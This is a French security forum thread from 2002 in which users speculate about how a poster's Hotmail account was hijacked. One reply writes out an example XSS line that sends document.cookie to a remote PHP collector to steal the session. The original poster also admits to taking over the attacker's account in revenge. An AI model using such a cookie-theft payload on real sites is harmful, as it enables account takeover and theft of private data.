je me suis fait hacké mon compte hotmail en 2 secondes !!!

Forum sur la sécurité des réseaux, la configuration des firewalls, la mise en place de protections contre les attaques, de DMZ, de systèmes anti-intrusion ...

Modérateur: modos Ixus

Messagepar stefroy » 09 Mai 2002 00:08

j'ai assisté au hackage de mon compte hotmail en 2 secondes. <BR>Le plaisantin, c'est connecté et m'a donc deconnecté du messenger msn. Puis il m'a été impossible de me reloger car le password avait été changer. Il est aussi impossible à hotmail de m'identifier à présent, il semblerait que le petit malin ai aussi modifier les infos me permettant de m'identifier aupres de hotmail. <BR> <BR>Je ne sais pas comment il a fait. Il a aussi fait la meme chose pour certains compte de certains de mes contacts. <BR> <BR>j'ai lu par ci par là que des scripts permettait de faire cela. <BR>Je ne vous pas comment il a pu faire. <BR>Cela montre bien que microsoft à encore des pb de sécurité à résoudre <IMG SRC="images/smiles/icon_frown.gif"> <BR> <BR>Si vous avez des infos , je suis curieux de comprendre ce qu'il a bin pu faire.
Avatar de l’utilisateur
stefroy
Matelot
Matelot
 
Messages: 8
Inscrit le: 09 Mai 2002 00:00

Messagepar didier » 09 Mai 2002 00:22

ps: le serveur de front de msn est un FreeBSD <IMG SRC="images/smiles/icon_wink.gif"> LOL <BR>
-+ Entendu dans les couloirs... +-<br>/kickban reason: stack overflow in garbage collector
Avatar de l’utilisateur
didier
Capitaine de vaisseau
Capitaine de vaisseau
 
Messages: 307
Inscrit le: 18 Sep 2001 00:00
Localisation: montrouge(paris)

Messagepar stefroy » 09 Mai 2002 00:26

et alors ?
Avatar de l’utilisateur
stefroy
Matelot
Matelot
 
Messages: 8
Inscrit le: 09 Mai 2002 00:00

Messagepar OXO90 » 09 Mai 2002 00:40

Tu es sûr de ce fait ? <BR>Je veux dire par là qu'il est facile de se connecter à Hotmail, si on connait ton mot de passe par exemple qq un qui te veux pas forcément que du bien.... <BR> <BR>J'ai rien vu comme exploit en ce moment concernant Hotmail. <BR> <BR>Le fait que le serveur frontal soit une BSD signie juste que le serveur en lui-même est difficilement hackable par une personne qui ne soit pas un crack. <IMG SRC="images/smiles/icon_wink.gif">
"Passe Le Fun Autour De Toi ..."
Avatar de l’utilisateur
OXO90
Capitaine de vaisseau
Capitaine de vaisseau
 
Messages: 305
Inscrit le: 29 Déc 2001 01:00
Localisation: Strasbourg

Messagepar stefroy » 09 Mai 2002 01:38

je ne vois pas comment il aurait pu avoir mon password !!! <BR>ce qui est sur c'est qu'il c'est connecté avec mon login et il m'a donc déconnécté, j'ai eu un message me signalant que j'avais été deconnecter car j'étais connecté ailleur. <BR> <BR>Ce qui m'intrigue c'est qu'il a reussi a prendre le controle d'autre compte hotmail de certains de mes contacts. <BR> <BR>Je sais qu'il n'ai pas compétent pour faire cela, mais ce que je constate c'est qu'il l'a fait. <BR> <BR>Le seul moyen que j'ai trouvé, c'est de faire une demande aupres de hotmail suite à une perte du password. <BR>il te demande de remplir un formulaire dans lequel tu d'identifie. Les elements peuvent etre facile à trouver si tu connais la personne. <BR>Hotmail te donne un nouveau mot de passe et là le tour est jouer. <BR>Mais cette opération prend du temps et lui, il a fait cela en 2 minutes à peine <BR>je l'ai vu se deconencter et 2 minutes apres j'étais deconnecté. <BR>voila ce que je peux dire. <BR>Le pb , c'est que maintenant , je ne peux plus m'identifier aupres d'hotmail, j'ai donc perdu ma liste de contact, mes mails et surtout l'accés à la communauté que je modérais sur hotmail <IMG SRC="images/smiles/icon_frown.gif">
Avatar de l’utilisateur
stefroy
Matelot
Matelot
 
Messages: 8
Inscrit le: 09 Mai 2002 00:00

Messagepar gregory » 09 Mai 2002 21:41

n'aurais tu pas laisse au hasard traine ton mot de passe ou le taper au clavier devant des"potes"? <BR> <IMG SRC="images/smiles/icon_confused.gif">
utiliser PGP svp pour les messages securises
Avatar de l’utilisateur
gregory
Matelot
Matelot
 
Messages: 2
Inscrit le: 05 Mai 2002 00:00

Messagepar stefroy » 09 Mai 2002 21:46

non , je suis sur que personne ne m'a vu le faire !!! en plus je suis en vacance là. <BR>donc pas possible de jeter un oeil par dessus mon épaule lol
Avatar de l’utilisateur
stefroy
Matelot
Matelot
 
Messages: 8
Inscrit le: 09 Mai 2002 00:00

Messagepar Magistrat » 10 Mai 2002 11:01

<!-- BBCode Quote Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85%><TR><TD><font size=-2>En réponse à:</font><HR></TD></TR><TR><TD><FONT SIZE=-2><BLOCKQUOTE> <BR>Le 2002-05-09 01:38, stefroy a écrit: <BR>je ne vois pas comment il aurait pu avoir mon password !!! <BR> <BR>Le pb , c'est que maintenant , je ne peux plus m'identifier aupres d'hotmail, j'ai donc perdu ma liste de contact, mes mails et surtout l'accés à la communauté que je modérais sur hotmail <IMG SRC="images/smiles/icon_frown.gif"> <BR></BLOCKQUOTE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode Quote End --> <BR> <BR>hum sens pas bon du tout çà....hacker freeBSD, c ptetre un gus du Fbi même.. <IMG SRC="images/smiles/icon_lol.gif"> <BR> <BR>Sinon je comprend pas > mod pour une communauté hotmail ??? <BR> <BR>Pour que le post reste utile : <BR> <BR>1/ N'utilse pas cette daube de msn messenger et encore moins passeport qui peuvent être facilement vérolés par sniffers, backdoors et j'en passe. Concernant hotmail je suis mitigé, celui ci à connu moultes failles, mais pas en ce moment à ma connaissance. <BR> <BR>2/ Scan intégralement ta machine via un Anti trojans mis à jour ( type TDS3 diamondcs, cleaner etc...) voir et enregistrer des frappes au clavier c plutot simple et surtout rapide.... <BR> <BR>3/ Une autre supposition c'est effectivement pour récupérer un login utiliser le social engineering mais ca m'étonnerait, donc je penche plutot pour le detournement possible de ta session par un lien JS et un vol du cookie . Il t'a fait clicker sur un lien JS du style : <BR> <BR>[/img]< script > : location = 'http://www. multimania. com/ stefroy /recup .php ( cookie ='+ document .cookie; < /script >[img/] <BR>pour ensuite changer ton pass et les questions inhérentes au changement de celui-ci, c'est une des causes probables... Une chose est sure > ton compte est perdu, et ceux de tes contacts aussi d'ailleurs... <BR> <BR>cordialement <BR> <BR> <BR>_________________ <BR>-------------------------- <BR>Dans l'ombre de la toile <BR><BR><BR><font size=-2></font>
Avatar de l’utilisateur
Magistrat
Matelot
Matelot
 
Messages: 10
Inscrit le: 09 Avr 2002 00:00

Messagepar stefroy » 10 Mai 2002 12:38

j'ai lu des chose sur des scripts java pour hacker hotmail. <BR> <BR>j'ai utiliser thecleaner pour verifié que je n'avais pas de bebete dans ma machine, rien de detecter. <BR> <BR>je ne penses pas avoir cliqué sur un lien , il ne m'a rien envoyé. <BR>Mais c'est possible, effectivement qu'il m'ai piqué mon cookie, mais ensuite, comment il a fait pour utiliser ce cookie. <BR> <BR>Pour moi, le social hacking , c'est possible, il aurait pu retrouver les elements me permettant de m'identifier. <BR>C'est ce que je lui ai fait pour me vanger lol <BR>mais pour mes contacts c'est assez etrange. Pour certain, c'est possible , pour d'autre j'en doute. <BR> <BR>Salutations <BR>
Avatar de l’utilisateur
stefroy
Matelot
Matelot
 
Messages: 8
Inscrit le: 09 Mai 2002 00:00

Messagepar stefroy » 10 Mai 2002 12:41

j'avais créer une communauté sur hotmail , j'étais le modérateur, j'étais reconnu comme moderateur par mon login de compte hotmail et le cookie . Maintenant, je suis un simple visiteur pour cette communauté, j'étais le seul moderateur donc je ne peux pas me réinscrire car personne ne pourra me repondre lol <BR>voila pour l'histoire du mod sur communauté hotmail
Avatar de l’utilisateur
stefroy
Matelot
Matelot
 
Messages: 8
Inscrit le: 09 Mai 2002 00:00

Messagepar gregory » 11 Mai 2002 21:31

vraiment dangereuse ton aventure <BR>comme si le hacker savait ou attendait que tu sois connecte au reseau !! <BR>peut on imaginé un autre internaute avec le <BR>mème login et mot de passe ??
utiliser PGP svp pour les messages securises
Avatar de l’utilisateur
gregory
Matelot
Matelot
 
Messages: 2
Inscrit le: 05 Mai 2002 00:00

Messagepar stefroy » 11 Mai 2002 22:03

il ne m'attendait pas , mon amie tchatait avec lui, c'était son ex, il c'est faché et il nous a deconnecté comme s'il s'était connecté avec mon login et password et ensuite, il a du modifier tous les elements de mon compte car je ne peut meme plus m'identifier aupres de hotmail, mes infos d'inscription ne corresponde plus <BR>
Avatar de l’utilisateur
stefroy
Matelot
Matelot
 
Messages: 8
Inscrit le: 09 Mai 2002 00:00

Messagepar micj » 12 Mai 2002 13:11

<!-- BBCode Quote Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85%><TR><TD><font size=-2>En réponse à:</font><HR></TD></TR><TR><TD><FONT SIZE=-2><BLOCKQUOTE> <BR>Le 2002-05-10 12:38, stefroy a écrit: <BR>Pour moi, le social hacking , c'est possible, il aurait pu retrouver les elements me permettant de m'identifier. <BR>C'est ce que je lui ai fait pour me vanger lol <BR></BLOCKQUOTE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode Quote End --> <BR> <BR>Si tu appliques ce principe, je n'ai qu'une seule chose à dire, il ne faut pas venir se plaindre <BR> <BR>Si c'est là votre seule amusement, c'est lamentable. <BR>
Avatar de l’utilisateur
micj
Amiral
Amiral
 
Messages: 1142
Inscrit le: 20 Fév 2002 01:00
Localisation: Braine-L'Alleud/Belgique

Messagepar stefroy » 12 Mai 2002 15:11

je viens pas me plaindre, lorsque j'ai créé mon compte hotmail, j'ai répondu au question qui m'était posé , sans penser que certain pourrais aussi facilement prendre le controle de mon compte. tout le monde a du faire la meme chose lorsque l'on te demande ton nom, ta date de naissance etc.... <BR> <BR>Par contre, je confirme que sa technique n'est pas du social hacking. <BR> <BR>Il vient de me repiquer un autre compte que j'avais créer apres le 1er incident. <BR>Dans ce compte les infos que j'avais indiquées était toute erronées afin de l'empecher de proceder de cette maniére. <BR>Je sais qu'il a des contacts chez Microsoft , peut etre a t'il profité de l'indiscretion de certaines personnes de chez microsoft. <BR> <BR>Voila, mon but était simplement de faire connaire l'information, tout le monde est donc exposée à cette technique, mais je ne la connais pas !!! <BR>salutations <BR>
Avatar de l’utilisateur
stefroy
Matelot
Matelot
 
Messages: 8
Inscrit le: 09 Mai 2002 00:00

Messagepar Magistrat » 14 Mai 2002 00:35

la réponse à tes interrogations > <BR>je me suis trompé, il éxiste une faille msn, et elle marche fichtrement.... <BR> <BR>[/url]http://lesnouvelles.net/afficher.php?id=252[/url] <BR> <BR>[/url]http://www.iss.net/security_center/static/8084.php[/url] <BR> <BR>rdv au à la section patch hebdomadaire $soft <IMG SRC="images/smiles/icon_rolleyes.gif">
Avatar de l’utilisateur
Magistrat
Matelot
Matelot
 
Messages: 10
Inscrit le: 09 Avr 2002 00:00

Suivant

Retour vers Sécurité et réseaux

Qui est en ligne ?

Utilisateur(s) parcourant actuellement ce forum : Aucun utilisateur inscrit et 1 invité

cron